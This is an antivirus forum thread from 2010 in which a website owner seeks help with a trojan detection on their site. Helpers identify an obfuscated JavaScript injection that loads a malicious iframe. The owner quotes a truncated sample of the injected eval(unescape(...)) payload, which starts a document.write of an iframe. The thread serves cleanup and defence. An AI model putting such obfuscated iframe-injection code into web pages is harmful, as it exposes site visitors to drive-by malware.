« previous next »
Pages: [1]   Go Down

Author Topic: JS:ScriptPE-inf [Trj]  (Read 3422 times)

0 Members and 1 Guest are viewing this topic.

nikjames

  • Guest
JS:ScriptPE-inf [Trj]
« on: May 12, 2010, 10:41:38 AM »
I have a website that has this virus.  I have no idea what to do.  I thought I had deleted the infected files. Any one know what to do?
Logged

Hermite15

  • Guest
Re: JS:ScriptPE-inf [Trj]
« Reply #1 on: May 12, 2010, 12:28:54 PM »
you should post the address of that site  - breaking the link by replacing http with hxxp . Otherwise there's not much we could tell ???
Logged

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: JS:ScriptPE-inf [Trj]
« Reply #2 on: May 12, 2010, 01:33:49 PM »
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?
Maybe you could contact its webmaster.

Check here how to clean and make a website secure.
Logged
The best things in life are free.

nikjames

  • Guest
Re: JS:ScriptPE-inf [Trj]
« Reply #3 on: May 13, 2010, 03:35:33 AM »
the site is hxxp://plasticsurgeryofutah.com

I have the Free version of Avast and it wont give me the whole name or location of the bug.... I checked my index page as well as some others to find some suspicious javascript or iframes, or anything else, but with no luck.

I actually deleted several files that had the virus in them (I think), but AVAST still says the virus is still there.  I just don't know how to find it.  The website hxxp://www.unmaskparasites.com/ says that there is a suspisious script "eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D..." which I cant find (even just the keyword eval) in my code. 

Is there a chance I did delete it and avast and this "unmask" site are just using a cached version of the site or something like that?  I just can't figure it out. 

Any help would be greatly appreciated.
Logged

Jtaylor83

  • Guest
Re: JS:ScriptPE-inf [Trj]
« Reply #4 on: May 13, 2010, 03:48:46 AM »
I suggest you use MalwareByte's Antimalware.

Clean your browser cache and temporary files with ATF Cleaner or CCleaner (slim version).
Logged

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89210
  • No support PMs thanks
Re: JS:ScriptPE-inf [Trj]
« Reply #5 on: May 13, 2010, 04:21:01 AM »
You're site appears to have been hacked, the large chunk of obfuscated javascript on a single line just before the closing Body tag, see image1, I have broken the single line to make it easier to see.

avast isn't alone in finding the home page infected, see http://www.virustotal.com/analisis/c4a376a993d00182db3bc0a49bd93b33043c83bd1165d2ddfc683e242219381f-1273716502, results of a scan of the actual page displayed.

See image2 of the obfuscated script having been decoded, shows it creates an iframe tag that points to a malicious site, see image3, which will be run code in the in.php page it goes to...

Do you use a content management software to create pages dynamically (php, sql, etc.) ?
If so it is possible that your templates are what have been hacked.
« Last Edit: May 13, 2010, 04:23:41 AM by DavidR »
Logged
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.4.6112 (build 24.4.9067.762) UI 1.0.803/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security
Pages: [1]   Go Up
« previous next »